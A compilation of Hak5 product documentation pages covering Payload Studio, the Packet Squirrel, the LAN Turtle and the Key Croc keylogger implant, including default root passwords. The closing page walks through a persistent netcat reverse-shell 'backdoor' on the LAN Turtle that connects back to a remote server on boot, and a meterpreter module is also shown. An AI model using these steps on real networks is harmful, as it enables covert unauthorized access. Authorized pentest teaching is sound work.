**Requires:**
** **
**`Annotate Payload Usage By Line`**
** **
**to be checked/enabled**

Expensive Operation annotation
### `Annotate Compiler Parser Details` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#annotate-compiler-parser-details)
**Recommended Setting: Disabled/Unchecked (**
****`**affects performance**`****
**)**
With this option enabled, compiler parser info will be annotated per line in the main editor

Compiler Parser annotation
### `Annotate Pre-Processor Preview` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#annotate-pre-processor-preview)
**Recommended Setting: Disabled/Unchecked (**
****`**affects performance**`****
**)**
With this option enabled, each line will be annotated with how the compiler sees it after preprocessing, formatting, etc

Preprocessor preview annotation
### `Annotate Compiled Bytecode for Injections` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#annotate-compiled-bytecode-for-injections)
**Recommended Setting: Disabled/Unchecked (**
****`**affects performance**`****
**)**
With this option enabled, keystroke injection will show the byte-code generated annotated per line.

Compiled Bytecode for Injections annotation
### `DuckyScript Compiler Debug Logging` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#duckyscript-compiler-debug-logging)
**Recommended Setting: Disabled/Unchecked (affects performance)**
For use in bug reporting - may cause unstable performance.
Enable this to enable DuckyScript Compiler Debug logging in the browser console.
* * *
[_navigate\_before_ Editor Settings](https://docs.hak5.org/payload-studio/customization/editor-settings/)
---
# Packet Squirrel Mark by Hak5 | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Packet Squirrel Mark by Hak5
============================
The [Packet Squirrel](https://hak5.org/products/packet-squirrel)
by Hak5 is a stealthy pocket-sized man-in-the-middle. This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.

warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* [Packet Squirrel by Hak5](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/README.md)
Getting Started [_link_](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/#getting-started)
--------------------------------------------------------------------------------------------------------------
* [Packet Squirrel Basics](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/)
* [USB Flash Disk Support](https://docs.hak5.org/packet-squirrel/getting-started/usb-flash-disk-support/)
* [Default Settings](https://docs.hak5.org/packet-squirrel/getting-started/default-settings/)
* [LED Status Indications](https://docs.hak5.org/packet-squirrel/getting-started/led-status-indications/)
* [Selecting and Adding Payloads](https://docs.hak5.org/packet-squirrel/getting-started/selecting-and-adding-payloads/)
Default Payloads [_link_](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/#default-payloads)
----------------------------------------------------------------------------------------------------------------
* [Logging Network Traffic](https://docs.hak5.org/packet-squirrel/default-payloads/logging-network-traffic/)
* [Spoofing DNS](https://docs.hak5.org/packet-squirrel/default-payloads/spoofing-dns/)
* [OpenVPN Payload](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/)
Internet Connectivity [_link_](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/#internet-connectivity)
--------------------------------------------------------------------------------------------------------------------------
* [Getting the Packet Squirrel Online](https://docs.hak5.org/packet-squirrel/internet-connectivity/getting-the-packet-squirrel-online/)
Software Updates [_link_](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/#software-updates)
----------------------------------------------------------------------------------------------------------------
* [Upgrading Firmware](https://docs.hak5.org/packet-squirrel/software-updates/upgrading-firmware/)
* [Manual Upgrade](https://docs.hak5.org/packet-squirrel/software-updates/manual-upgrade/)
Payload Development [_link_](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/#payload-development)
----------------------------------------------------------------------------------------------------------------------
* [Payload Development Basics](https://docs.hak5.org/packet-squirrel/payload-development/payload-development-basics/)
* [Ducky Script for Packet Squirrel](https://docs.hak5.org/packet-squirrel/payload-development/ducky-script-for-packet-squirrel/)
* [The NETMODE Command](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/)
* [The LED Command](https://docs.hak5.org/packet-squirrel/payload-development/the-led-command/)
* [The SWITCH Command](https://docs.hak5.org/packet-squirrel/payload-development/the-switch-command/)
* [The BUTTON Command](https://docs.hak5.org/packet-squirrel/payload-development/the-button-command/)
* [Included Tools](https://docs.hak5.org/packet-squirrel/payload-development/included-tools/)
Troubleshooting [_link_](https://docs.hak5.org/packet-squirrel/packet-squirrel-mark-by-hak5/#troubleshooting)
--------------------------------------------------------------------------------------------------------------
* [Firmware Recovery](https://docs.hak5.org/packet-squirrel/troubleshooting/firmware-recovery/)
* [Factory Reset](https://docs.hak5.org/packet-squirrel/troubleshooting/factory-reset/)
* [FAQ](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/)
* * *
[Packet Squirrel Basics _navigate\_next_](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/)
---
# The Module System | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The Module System
=================
The LAN Turtle uses a modular system for managing its various tools and services. Turtle modules may be started, stopped, enabled, disabled or configured from the Module Menu.
### CONFIGURE [_link_](https://docs.hak5.org/lan-turtle/getting-started/the-module-system/#configure)
Configuring a module typically involves entering data specific to your deployment. For example, when configuring the Meterpreter module, you must specify the listening host and port. When configuring the Nmap module you must specify a target, profile and log. Configuration changes made through the graphical Turtle Shell are generally saved in config files and are persistent upon reboot.
### START / STOP [_link_](https://docs.hak5.org/lan-turtle/getting-started/the-module-system/#start--stop)
Once configured, a module may be Started or Stopped from the Module Menu. Generally a module may not be started until it has been configured. Some modules, such as the SSH Key Manager, do not support starting and only allow for configuration. Some modules stay running once started. For instance the autossh module will maintain a persistent secure shell until stopped. Other modules will start a task then stop when completed, such as script2email or nmap-scan.
### ENABLE / DISABLE [_link_](https://docs.hak5.org/lan-turtle/getting-started/the-module-system/#enable--disable)
Modules may be set to start up once the LAN Turtle has booted. For example an OpenVPN session may be established upon power-up by first configuring the module and testing it using the start and stop feature. Once the module is achieving the desired result, the module may be Enabled from the Module Menu. Now the LAN Turtle can be deployed on a target network with the OpenVPN module establishing a connection without intervention from the user. An enabled module will start on every boot unless disabled from the Module Menu.
### ADDITIONAL MODULES [_link_](https://docs.hak5.org/lan-turtle/getting-started/the-module-system/#additional-modules)
The LAN Turtle is designed to enable rapid module development. Any supported language (such as bash, php, or python) may be used to write a Turtle Module. With just a few core functions required, modules may be quickly developed and tested. Once submitted to the LAN Turtle Module Repository, they may become available for other LAN Turtle users to download and enjoy. For more information on writing modules, consult the developer documentation at LANTurtle.com
* * *
[_navigate\_before_ LAN Turtle Basics](https://docs.hak5.org/lan-turtle/getting-started/lan-turtle-basics/)
[Default Settings _navigate\_next_](https://docs.hak5.org/lan-turtle/getting-started/default-settings/)
---
# Overview | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Overview
========
* * *
description: Unleash your hacking creativity with the official DuckyScript™ editor [_link_](https://docs.hak5.org/payload-studio/getting-started/overview/#description-unleash-your-hacking-creativity-with-the-official-duckyscript-editor)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

PayloadStudio Splash screen
PayloadStudio .png) Edition [_link_](https://docs.hak5.org/payload-studio/getting-started/overview/#payloadstudio--edition)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
While PayloadStudio offers a community edition that provides everything you _need_ out of the box _\-_ the {< highlight color=“red” >}**Pro Edition**{< /highlight >} provides access to every convenience and configuration option PayloadStudio has to offer.
info
.png) license holders also gain access to BETA - access to the latest fixes and features before they’re released to community edition.
Get a pro license [https://hak5.org/products/payload-studio-pro](https://hak5.org/products/payload-studio-pro)
Introduction [_link_](https://docs.hak5.org/payload-studio/getting-started/overview/#introduction)
---------------------------------------------------------------------------------------------------
PayloadStudio is an IDE (or _Integrated Development Environment_) for the collection of DuckyScript™ compatible platforms including the USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel, and LAN Turtle and even O.MG Devices!

PayloadStudio Device Picker
PayloadStudio assists in development by providing a _**consistent**_ programming environment, syntax highlighting, auto-completion, debugging, and automatic compiling. It helps take the frustration out of programming complex DuckyScript payloads, so you can focus on your engagements!

PayloadStudio Editor
How it Works [_link_](https://docs.hak5.org/payload-studio/getting-started/overview/#how-it-works)
---------------------------------------------------------------------------------------------------
Payload Studio runs in your browser - on your Linux, Windows, or macOS system, your tablet, your phone, anywhere you have a modern browser! After loading the page PayloadStudio runs 100% client side in your browser.
check\_circle
Your files are never sent to “the cloud” or uploaded anywhere! Your payload development is stored _on your computer_. Encapsulated completely by your browser.
Updates to PayloadStudio are rolled out seamlessly so you’ll never have to install, host, update or maintain it yourself!
PayloadStudio has been tested with Chrome (and Chromium based browsers), Edge, Mozilla Firefox, and Safari, and should be compatible with other modern browser platforms. Korben has even run it _on his smart watch_… This IDE is **seriously portable.**
* * *
[_navigate\_before_ PayloadStudio](https://docs.hak5.org/payload-studio/payloadstudio/)
[Getting Started _navigate\_next_](https://docs.hak5.org/payload-studio/getting-started/getting-started/)
---
# Appearance | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Appearance
==========
Customize the look at feel of PayloadStudio by changing the **themes** from within **Settings > IDE Settings**
info
The **full list of IDE Settings** can be found on the [IDE Settings](https://docs.hak5.org/payload-studio/customization/ide-settings/)
Page
Theme [_link_](https://docs.hak5.org/payload-studio/customization/appearance/#theme)
-------------------------------------------------------------------------------------
The **Theme** option will change both the main editor and the overall appearance of PayloadStudio

Settings > IDE Settings > Theme

Console Theme Demo

Language Editor themed with the Console Theme setting
Advanced Editor Customization .png) [_link_](https://docs.hak5.org/payload-studio/customization/appearance/#advanced-editor-customization)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PayloadStudio PRO gives you full control over how writing code looks and feels within the editor.
info
The **full list of Editor settings** can be found on the [Editor Settings](https://docs.hak5.org/payload-studio/customization/editor-settings/)
Page
* * *
[_navigate\_before_ Faq](https://docs.hak5.org/payload-studio/getting-started/faq/)
[Keyboard Shortcuts _navigate\_next_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/)
---
# Usb Flash Disk Support | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Usb Flash Disk Support
======================
The Packet Squirrel supports USB flash disks formatted with either **EXT4** or **NTFS** file systems. This is of particular importance since most USB flash disks come pre-formatted with **FAT32** file systems and must be reformatted before use with the Packet Squirrel.
### WINDOWS USERS [_link_](https://docs.hak5.org/packet-squirrel/getting-started/usb-flash-disk-support/#windows-users)
With a USB flash disk connected, open Explorer and navigate to This PC. Right-click the USB flash disk and select Format. From the file system options, select NTFS and click Start. A volume label may be added for convenience. A quick format is all that is necessary to provision the drive.

### LINUX USERS [_link_](https://docs.hak5.org/packet-squirrel/getting-started/usb-flash-disk-support/#linux-users)
Most Linux distributions include the “Disks” utility. With a flash disk connected, launch Disks. Select the USB flash disk then click the gear icon and choose format. From the format volume menu, choose EXT4 from the type options and click format. A volume label may be added for convenience.

* * *
[_navigate\_before_ Packet Squirrel Basics](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/)
[Default Settings _navigate\_next_](https://docs.hak5.org/packet-squirrel/getting-started/default-settings/)
---
# Default Settings | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Default Settings
================
* IP Address: `172.16.84.1`
* Port: `22` _SSH default_
* Username: `root`
* Password: `sh3llz` \*_Must change on initial setup_
* * *
[_navigate\_before_ The Module System](https://docs.hak5.org/lan-turtle/getting-started/the-module-system/)
[SSH Clients _navigate\_next_](https://docs.hak5.org/lan-turtle/getting-started/ssh-clients/)
---
# Editing Basics | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Editing Basics
==============
info
**Don’t worry**, you can always change the device mode while editing a payload!
Changing Device / Editing mode [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#changing-device--editing-mode)
--------------------------------------------------------------------------------------------------------------------------------------------
Changing editor modes is as easy as two clicks!
1. Click the current device from the top left of the editor
2. Choose a new device mode from the Device Picker Menu

Change editor mode

Changing devices from the Device Picker
Payload Studio supports the full line of Hak5 DuckyScript compatible devices:
[USB Rubber Ducky](https://hak5.org/products/usb-rubber-ducky)
[_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#usb-rubber-ducky)
----------------------------------------------------------------------------------------------------------------------------------------------------------------

USB Rubber Ducky Mode
### Ducky Payload Deployment [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#ducky-payload-deployment)
When you’re ready to test or deploy your payload:
click the  button; PayloadStudio will then take the `DuckyScript Source code` in the Editor and compile it into an `inject.bin`

Compiling Notification
PayloadStudio will automatically open the console. This is where the compiler will output any information regarding the compilation process and the resulting `inject.bin`

PayloadStudio Compiler output in the Console
Below the console, if your payload compiled successfully, you’ll find the **Result**

Generate Payload Result
Here you can download the `inject.bin`
Download `inject.bin`

Download button

Download Button on hover
This dialog also provides the option to download **the source that generated** the `inject.bin` – This _may differ from whats currently in the editor if you’ve made changes in the editor since compiling_
Download Source:

Download Submenu

Download submenu > Download Source button
From this sub-menu you may also discard the `inject.bin`
If you’ve made changes in the editor after clicking **Generate Payload** - PayloadStudio will notify you that the current editing session differs from the `inject.bin` and `payload.txt` available for download:

Uncompiled Changes display in the breadcrumbs

Editor differs from available download
info
You can always download a copy of the current editor from **File > Save**.
.png)
[Bash Bunny](https://hak5.org/products/bash-bunny)
[_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#bash-bunny)
----------------------------------------------------------------------------------------------------------------------------------------------

Bash Bunny Mode
### Bunny Payload Deployment [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#bunny-payload-deployment)
Click  or .png)
Next, arm and transfer to the device - for more info see [Bash Bunny Documentation](https://docs.hak5.org/bash-bunny/)
[Key Croc](https://hak5.org/products/key-croc)
[_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#key-croc)
----------------------------------------------------------------------------------------------------------------------------------------

Key Croc Mode
### Croc Payload Deployment [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#croc-payload-deployment)
Click  or 
Next, arm and transfer to the device - for more info see [Key Croc Documentation](https://docs.hak5.org/key-croc/)
[Shark Jack](https://hak5.org/products/shark-jack)
[_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#shark-jack)
----------------------------------------------------------------------------------------------------------------------------------------------

Shark Jack Mode
### Shark Payload Deployment [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#shark-payload-deployment)
Click  or .png)
Next, arm and transfer to the device - for more info see [Shark Jack Documentation](https://docs.hak5.org/shark-jack/)
[Packet Squirrel](https://hak5.org/products/packet-squirrel)
[_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#packet-squirrel)
-------------------------------------------------------------------------------------------------------------------------------------------------------------

Packet Squirrel Mode
### Squirrel Payload Deployment [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#squirrel-payload-deployment)
Click  or .png)
Next, arm and transfer to the device - for more info see [Packet Squirrel Documentation](https://docs.hak5.org/packet-squirrel/)
[LAN Turtle](https://hak5.org/products/lan-turtle)
[_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#lan-turtle)
----------------------------------------------------------------------------------------------------------------------------------------------

LAN Turtle Mode
### Turtle Payload Deployment [_link_](https://docs.hak5.org/payload-studio/getting-started/editing-basics/#turtle-payload-deployment)
Click  or .png)
Next, arm and transfer to the device - for more info see [LAN Turtle Documentation](https://docs.hak5.org/lan-turtle/)
* * *
[_navigate\_before_ Getting Started](https://docs.hak5.org/payload-studio/getting-started/getting-started/)
[Faq _navigate\_next_](https://docs.hak5.org/payload-studio/getting-started/faq/)
---
# Default Settings | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Default Settings
================
These are the default settings for the Packet Squirrel
* Username: `root`
* Password: `hak5squirrel`
* IP Address: `172.16.32.1`
* * *
[_navigate\_before_ Usb Flash Disk Support](https://docs.hak5.org/packet-squirrel/getting-started/usb-flash-disk-support/)
[LED Status Indications _navigate\_next_](https://docs.hak5.org/packet-squirrel/getting-started/led-status-indications/)
---
# SSH Clients | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
SSH Clients
===========
### LINUX AND OSX [_link_](https://docs.hak5.org/lan-turtle/getting-started/ssh-clients/#linux-and-osx)
Linux and Mac operators are recommended to use the built in SSH client (typically openssh). With the LAN Turtle plugged into the user’s PC, an SSH connection is usually initiated by issuing “ssh [root@172.16.84.1](mailto:root@172.16.84.1)
” from the terminal.
`ssh root@172.16.84.1`
### WINDOWS [_link_](https://docs.hak5.org/lan-turtle/getting-started/ssh-clients/#windows)
Since Microsoft does not bundle an SSH client with Windows by default, Windows users are encouraged to use the open source PuTTY client from: [http://www.chiark.greenend.org.uk/~sgtatham/putty](http://www.chiark.greenend.org.uk/~sgtatham/putty)
> Please Note: for the best experience, choose ISO-8859-1 Remote character set from Window > Translation. Otherwise the menu outlines may seem garbled.
### ANDROID [_link_](https://docs.hak5.org/lan-turtle/getting-started/ssh-clients/#android)
For quick access and configuration changes in the field, the LAN Turtle’s Shell can be accessed from an Android Tablet or Smartphone by using a USB OTG cable and SSH client. [ConnectBot](https://play.google.com/store/apps/details?id=org.connectbot\\&hl=en)
is a free open source Secure Shell client available in the Google play store.
* * *
[_navigate\_before_ Default Settings](https://docs.hak5.org/lan-turtle/getting-started/default-settings/)
[Connecting For The First Time _navigate\_next_](https://docs.hak5.org/lan-turtle/setup-guides/connecting-for-the-first-time/)
---
# Keycroc by Hak5 | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Keycroc by Hak5
===============
The Key Croc is a smart keylogger and pentest implant featuring a pattern matching payload system and remote management capabilities. This documentation covers the basics of operation and deployment, accessing the Linux shell for advanced operations, Internet connectivity, software updates and payload development.

Key Croc
warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
Specifications [_link_](https://docs.hak5.org/key-croc/keycroc-by-hak5/#specifications)
----------------------------------------------------------------------------------------
INTERFACE: USB
STANDARDS: USB 2.0
FREQUENCY RANGE: 2.412 ~ 2.4835 GHz
SIZE: 74 x 27 x 14 mm
POWER: 5W (USB 5V 1A)
OPERATING TEMPERATURE: 35ºC ~ 45ºC
STORAGE TEMPERATURE: -20ºC ~ 50ºC
RELATIVE HUMIDITY: 0% to 90% (noncondensing)
Important Safety Information and Warnings [_link_](https://docs.hak5.org/key-croc/keycroc-by-hak5/#important-safety-information-and-warnings)
----------------------------------------------------------------------------------------------------------------------------------------------
Your device may get hot to the touch; this is normal. Unplug the device and let it cool before removing it. This device complies with applicable surface temperature standards and limits defined by the International Standard for Safety (IEC 60950-1). Still, sustained contact with warm surfaces for long periods of time may cause discomfort or injury. Keep the device in a well-ventilated area when in use. Allow for adequate air circulation under and around the device. Do not expose the device to water or extreme conditions (moisture, heat, cold, dust), as the device may malfunction or cease to work when exposed to such elements. Do not attempt to disassemble or repair the device yourself. Doing so voids the limited warranty and could harm you or the device. This device is not designed, manufactured or intended for use in hazardous environments requiring fail-safe performance in which the failure of the device could lead directly to death, personal injury, or severe physical or environmental damage.
The Key Croc is a network administration and pentesting tool for authorized auditing and security analysis purposes only where permitted subject local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. © Hak5 LLC.
This device complies with Part 15 of the FCC Rules. Operation is subject to the following two conditions: (1) this device may not cause harmful interference, and (2) this device must accept any interference received, including interference that may cause undesired operation. Warning (Part 15.21) Changes or modifications not expressly approved by the party responsible for compliance could void the user’s authority to operate the equipment. RF Exposure (OET Bulletin 65) To comply with FCC RF exposure requirements for mobile transmitting devices, this transmitter should only be used or installed at locations where there is at least 20cm separation distance between the antenna and all persons. Information to the User - Part 15.105 (b) Note: This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to part 15 of the FCC Rules. These limits are designed to provide reasonable protection against harmful interference in a residential installation. This equipment generates, uses and can radiate radio frequency energy and, if not installed and used in accordance with the instructions, may cause harmful interference to radio communications. However, there is no guarantee that interference will not occur in a particular installation. If this equipment does cause harmful interference to radio or television reception, which can be determined by turning the equipment off and on, the user is encouraged to try to correct the interference by one or more of the following measures: \* Reorient or relocate the receiving antenna. \* Increase the separation between the equipment and receiver. \* Connect the equipment into an outlet on a circuit different from that to which the receiver is connected. \* Consult the dealer or an experienced radio/TV technician for help.
Key Croc is a trademark of Hak5 LLC. This product is packaged with a limited warranty, the acceptance of which is a condition of sale. See Hak5.org for additional warranty details and limitations. Availability and performance of certain features, services and applications are device and network dependent and may not be available in all areas; additional terms, conditions and/or charges may apply. All features, functionality and other product specifications are subject to change without notice or obligation. Hak5 LLC reserves the right to make changes to the products description in this document without notice. Hak5 LLC does not assume any liability that may occur due to the use or application of the product(s) described herein. Made in China. Designed in San Francisco by Hak5 LLC, 548 Market Street, #39371, San Francisco, CA, 94104.
* * *
[Key Croc Basics _navigate\_next_](https://docs.hak5.org/key-croc/basics/key-croc-basics/)
---
# LED Status Indications | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
LED Status Indications
======================
The following are the LED status indications for the Packet Squirrel
| LED | Status |
| --- | --- |
| Green (blinking) | Booting up |
| Blue (blinking) | Arming Mode |
| Red (blinking) | Error reading USB disk |
| Cyan (1 blink) | Starting payload 1 |
| Cyan (2 blinks) | Starting payload 2 |
| Cyan (3 blinks) | Starting payload 3 |
* * *
[_navigate\_before_ Default Settings](https://docs.hak5.org/packet-squirrel/getting-started/default-settings/)
[Selecting And Adding Payloads _navigate\_next_](https://docs.hak5.org/packet-squirrel/getting-started/selecting-and-adding-payloads/)
---
# Setting Up A New Lan Turtle | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Setting Up A New Lan Turtle
===========================
From time to time new version of the LAN Turtle firmware will become available. Thankfully upgrading is made very simple. Begin by getting your LAN Turtle connected to the Internet. Simply connect the RJ45 Ethernet port to a local network. By default the LAN Turtle will attempt to obtain IP information from DHCP. If a static IP address is required on your network it may be set from the Configuration menu.
Test your LAN Turtle’s Internet connection. From the SSH session to the LAN Turtle, exit the Turtle Shell menu (or press the ESCAPE key until you’re presented with a root@turtle:~# prompt). Ping your favorite host.
`ping -c4 8.8.8.8`
Once you’ve verified that your LAN Turtle is online, we’re ready to update the firmware. Return to the Turtle Shell by issuing the turtle command. Navigate to the Config screen and choose check for updates. This process takes about 10 minutes to complete. When the LAN Turtle downloads the update and begins flashing, the SSH session will close. This is expected.
When the update is complete you can SSH back into the LAN Turtle. The password will have been reset to the default (sh3llz), and once again you’ll be prompted to change the password.
Keep in mind that flashing the firmware replaces everything stored on the LAN Turtle memory, so be sure to backup any documents. Modules can be re-downloaded from the Module Manager upon firmware update.
* * *
[_navigate\_before_ Connecting For The First Time](https://docs.hak5.org/lan-turtle/setup-guides/connecting-for-the-first-time/)
[Installing Modules _navigate\_next_](https://docs.hak5.org/lan-turtle/setup-guides/installing-modules/)
---
# Selecting And Adding Payloads | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Selecting And Adding Payloads
=============================
To choose a payload, flip the selection switch to the desired position before powering on the Packet Squirrel. When it boots up, it will start the payload associated with the switch position.
Payloads can be stored on internal memory or externally from a USB disk.
On boot priority will be given to the USB disk – so if a payload exists there it will override any payloads stored on the internal memory.
If no USB disk is connected, or a USB disk is connected that does not contain payloads, the payloads stored on internal memory will start.
Payloads on internal memory are stored in `/root/payloads` in folders named `switch1`, `switch2` and `switch3` – which are associated with the payload selector switch hardware.
Payloads on USB disks should be stored in `/payloads/` in corresponding `switch1`, `switch2` and `switch3` folders.
* * *
[_navigate\_before_ LED Status Indications](https://docs.hak5.org/packet-squirrel/getting-started/led-status-indications/)
[Logging Network Traffic _navigate\_next_](https://docs.hak5.org/packet-squirrel/default-payloads/logging-network-traffic/)
---
# Installing Modules | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Installing Modules
==================
Installing modules on the LAN Turtle is a simple process. From the Turtle Shell main menu, navigate to Modules. Select Module Manager and press enter. Tab over to select Configure and press enter. From the module manager configuration screen you’ll have the ability to download modules over directly from lanturtle.com. Select Directory and press enter, then select Yes to confirm the connection.
The directory will list all of the available modules. Use the spacebar to check the box next to the modules you wish to install, then press enter to continue. Be sure to install the NetCat Reverse Shell (netcat-revshell) module if following along with the next section. Modules will be downloaded from the online repository and installed to /etc/turtle/modules on the LAN Turtle.
Similarly, the Delete option from Module Manager allows you to remove any modules you wish. The Update option will get the latest version of all modules currently installed.
Modules may be started, stopped and configured from the Modules menu in the Turtle Shell. Alternatively they may be started, stopped and configured manually from the command line as follows:
`/etc/turtle/modules meterpreter configure /etc/turtle/modules meterpreter start /etc/turtle/modules meterpreter stop`
* * *
[_navigate\_before_ Setting Up A New Lan Turtle](https://docs.hak5.org/lan-turtle/setup-guides/setting-up-a-new-lan-turtle/)
[Your First Reverse Shell _navigate\_next_](https://docs.hak5.org/lan-turtle/setup-guides/your-first-reverse-shell/)
---
# Your First Reverse Shell | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Your First Reverse Shell
========================
“Netcat (often abbreviated to nc) is a computer networking service for reading from and writing to network connections using TCP or UDP.
Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation its user could need and has a number of built-in capabilities.
> Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.” ?Wikipedia
In this section we’ll set up a “backdoor” on the LAN Turtle with Netcat. This will be achieved by configuring a server online to host a Netcat listener on port 8080. Then on the LAN Turtle we’ll configure the Netcat Reverse Shell module to connect to the server on boot.
Begin by SSH’ing into your online server. There are many inexpensive options for this, and a good VPS or shell is highly recommended. Most VPS hosts come with a static IP address and the operating system of your choice. In this example we’ll assume you have an Ubuntu server at 93.184.216.34. From the SSH session with your Ubuntu server online, start a netcat listener on port 8080.
`nc -lp 8080`
Netcat is included by default on most Linux distributions. If it is not, try installing it from the repositories. For example, on Ubuntu you may use apt-get to install netcat with the following:
`apt-get install netcat`
With our netcast listener running on the server online, we’re ready to configure the LAN Turtle. From the SSH session with the LAN Turtle, navigate to the Modules section of the Turtle Shell. Select the NetCat Reverse Shell module and configure. When prompted, enter the IP address and port number of your server’s netcat listener. In our example the IP address is 93.184.216.34 and port number is 8080. Tab over to Submit and press enter to save these values.
Now that the NetCat Reverse Shell module is configured, it can be tested by tabbing over to the Start option and pressing enter. You’ll receive a notice that the module has started. Press enter to return to the module screen and notice the current status and bootup status.
From the NetCat listener on our server it may not be apparent that anything has happened. This is because the netcat reverse shell does not pass over the prompt. That said, issuing a command will execute on the LAN Turtle just as it would over an SSH connection. Try concatenating the login banner.
`cat /etc/banner`
From the SSH session on the LAN Turtle, tab over to the Stop option on the module screen and press enter. You’ll receive a notice that the module has stopped. Now go back and notice the netcat listener on the server. It will have terminated. This means we’ll be unsuccessful if you attempt to start the module again. To solve this issue, we can either use a version of NetCat with a keepalive option, or run the NetCat listener in a screen session inside of a while loop.
From the server, try the following:
`screen -dmS netcat_listener bash -c 'while true; do nc -lp 8080; done'`
This will create a new detached screen session that will stay persistent even after you disconnect the SSH session with the server. The screen session will be running the bash one-liner while true; do nc -lp 8080; done. This simple while loop means as soon as the NetCat listener terminates, it will start again. You can display the running screen sessions with the screen -list command, and reconnect to a running screen session with the screen -r netcat\_listener command. Detatch from the screen session again using the CTRL+a, d keyboard combination.
Similar to NetCat, if screen isn’t installed by default on your server you may install it from the repositories. For example, on Ubuntu you may issue apt-get install screen.
With this more robust listener running, we can now enable the NetCat Reverse Shell module on the LAN Turtle. With the module enabled, the reverse shell will attempt to establish with our server every time the LAN Turtle boots.
Now this is a very basic reverse shell over NetCat. It can be used to manage the LAN Turtle from afar, as long as both you and the LAN Turtle have access to the server online. It illustrates the basic process of configuring, testing, enabling and deploying a module on the LAN Turtle.
